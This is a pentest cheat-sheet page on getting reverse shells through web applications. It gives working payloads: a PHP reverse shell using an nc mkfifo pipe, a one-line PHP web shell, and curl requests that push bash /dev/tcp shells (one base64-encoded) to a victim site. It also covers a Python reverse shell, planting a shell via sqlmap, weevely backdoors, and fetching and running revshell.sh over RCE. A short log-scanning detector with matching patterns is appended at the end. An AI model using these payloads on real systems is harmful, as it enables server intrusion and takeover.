Web Reverse Shell

Last modified: Tue Nov 21 2023 00:00:00 GMT+0000 (Coordinated Universal Time)

Tags: Privilege Escalation, Reverse Shell, Web

We can get a shell by placing a reverse shell payload on the target website.

PHP Reverse Shell (Linux)

# From the local copy (shipped by default in Kali and Parrot)
cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php

# From the repo (https://github.com/pentestmonkey/php-reverse-shell)
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
# From the repo (https://github.com/flozz/p0wny-shell)
wget https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -O shell.php

Replace $ip and $port in the script with your local IP address and port.

Without fsockopen, and for FreeBSD

<?php
set_time_limit(0);
$ip = '10.0.0.1';  // CHANGE THIS
$port = 4444;      // CHANGE THIS

// Spawn a shell process (follows the proc_open() example from the PHP manual)
$descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child reads from
    1 => array("pipe", "w"),  // stdout is a pipe that the child writes to
    2 => array("file", "/tmp/error-output.txt", "a")  // stderr is appended to a file
);

$cwd = "/tmp";
$env = array('some_option' => 'aeiou');  // environment handed to the child; any value works

$process = proc_open('sh', $descriptorspec, $pipes, $cwd, $env);

if (is_resource($process)) {
    // Double quotes are required so that $ip and $port are interpolated;
    // in single quotes the literal text "$ip $port" would be passed to sh.
    fwrite($pipes[0], "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip $port >/tmp/f");
    fclose($pipes[0]);

    echo stream_get_contents($pipes[1]);
    fclose($pipes[1]);

    $return_value = proc_close($process);
    echo "command returned $return_value\n";
}
?>

Using Web Shell

Create a PHP script that lets us execute arbitrary commands.

<?php system($_REQUEST['test']); ?>

Then upload it to the target website.
Now we may be able to execute arbitrary commands, and in particular spawn a reverse shell as below.
The command is passed with -G --data-urlencode so that spaces, quotes and redirection characters are URL-encoded correctly.

curl -G --data-urlencode 'test=bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"' https://victim.com/uploads/shell.php

# Base64-encoded payload (the same command as above; URL-encoding also keeps the '+' in the
# base64 text from being turned into a space by the server)
curl -G --data-urlencode 'test=echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA+JjEi | base64 -d | bash' https://victim.com/uploads/shell.php

PHP Reverse Shell (Windows)

Below are the available payloads.


Python Reverse Shell (Linux)

This requires both uploading a payload to the target website and a way to execute commands there.
First, create a Python file, e.g. "revshell.py". Replace the IP address and the port with your own.

# revshell.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])

Then upload it to the target website.
Next, start a listener on the local machine.

nc -lvnp 4444

Now we need some way to execute commands on the target website, e.g.:

python3 /path/to/revshell.py

If successful, we should get a shell.


ASP.NET

We can use an .aspx file for a reverse shell. Download it from here.


Upload Script via SQLi

# req.txt: the raw HTTP request saved from Burp Suite
sqlmap -r req.txt --dbs --random-agent --batch --file-dest=/var/www/html/shell.php --file-write=./shell.php

Useful Tools

  • Weevely3

    A web shell generator.

    1. Generate Backdoor with Password

      A password is required.

      weevely generate <password> ./shell.php

    2. Upload the Payload to Target Website and Execute Commands

      weevely https://vulnerable.com/upload/shell.php <password> whoami

    3. Get a Shell

      weevely https://vulnerable.com/upload/shell.php <password>

Shell Script & Remote Code Execution (RCE)

If we find a website that is vulnerable to Remote Code Execution but cannot get a reverse shell directly, we may be able to get one by uploading a script.

1. Create a shell script for the reverse shell.

The file is named "revshell.sh".

#!/bin/bash
bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1

2. Upload the script to the website

Start a web server on the local machine to serve the script.

python3 -m http.server 8000

Then fetch it onto the target via the remote code execution.

https://vulnerable.com/?cmd=wget http://<local-ip>:8000/revshell.sh
# or (-O saves the file instead of printing it)
https://vulnerable.com/?cmd=curl -O http://<local-ip>:8000/revshell.sh

To confirm the script was uploaded, run the following via the RCE.

https://vulnerable.com/?cmd=ls

3. Get a shell

Start a listener on the local machine to catch the shell.

nc -lvnp 4444

Now execute the uploaded script via the RCE.

# 1. Change the permissions of the script
https://vulnerable.com/?cmd=chmod 777 revshell.sh
# 2. Execute the script
https://vulnerable.com/?cmd=./revshell.sh

We should now have a shell on the target.
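As an added, defender-side example (not code from the original page), the following Python scans web server access-log lines for the request shapes shown in the "Using Web Shell" and "Shell Script & RCE" sections above: commands passed in parameters such as ?test= or ?cmd=, including the base64-wrapped variant, which it decodes before matching. The log lines, client IPs and alert names are constructed for illustration.

```python
import base64
import re
from urllib.parse import parse_qsl, urlsplit

# Request-parameter patterns taken from the payload shapes on this page, each with an alert reason.
SHELL_PATTERNS = [
    ("reverse shell via /dev/tcp", re.compile(r"/dev/tcp/")),
    ("interactive shell", re.compile(r"\b(ba)?sh -i\b")),
    ("fifo-based shell", re.compile(r"mkfifo")),
    ("piped into a shell", re.compile(r"\|\s*(ba)?sh\b")),
    ("script fetched from a remote host", re.compile(r"\b(wget|curl)\b.*\.sh\b")),
]
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")  # long base64-looking runs
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode_b64_fragments(text):
    decoded = []  # best-effort decode of every long base64 token (base64-wrapped payloads)
    for token in B64_TOKEN.findall(text):
        try:
            decoded.append(base64.b64decode(token, validate=True).decode("utf-8", "replace"))
        except ValueError:  # not valid base64 after all
            continue
    return decoded

def inspect_request(path):
    """Return deduplicated (param, reason) hits for one request path plus query string."""
    hits = []
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        for text in [value] + decode_b64_fragments(value):  # parse_qsl already percent-decoded value
            for reason, pattern in SHELL_PATTERNS:
                if pattern.search(text) and (name, reason) not in hits:
                    hits.append((name, reason))
    return hits

def scan_log(lines):
    """Return (client_ip, path_without_query, hits) for each suspicious access-log line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (hits := inspect_request(m.group(2))):
            findings.append((m.group(1), m.group(2).split("?", 1)[0], hits))
    return findings
# Constructed sample lines in Apache combined-log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Nov/2023:10:01:02 +0000] "GET /uploads/shell.php?test=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/10.0.0.1/4444%200%3E%261%22 HTTP/1.1" 200 12',
    '203.0.113.7 - - [21/Nov/2023:10:01:30 +0000] "GET /uploads/shell.php?test=echo%20YmFzaCAtYyAiYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4wLjAuMS80NDQ0IDA%2BJjEi%20%7C%20base64%20-d%20%7C%20bash HTTP/1.1" 200 12',
    '198.51.100.9 - - [21/Nov/2023:10:02:11 +0000] "GET /?cmd=wget%20http://10.0.0.1:8000/revshell.sh HTTP/1.1" 200 0',
    '192.0.2.44 - - [21/Nov/2023:10:03:00 +0000] "GET /search.php?q=bash+scripting+tutorial HTTP/1.1" 200 5120',
]
```

Run scan_log(SAMPLE_LOG) to see the three suspicious requests flagged while the ordinary search query is ignored; in practice the same check belongs in a log pipeline or WAF rule, and any hit should be followed by reviewing the flagged path for an uploaded script.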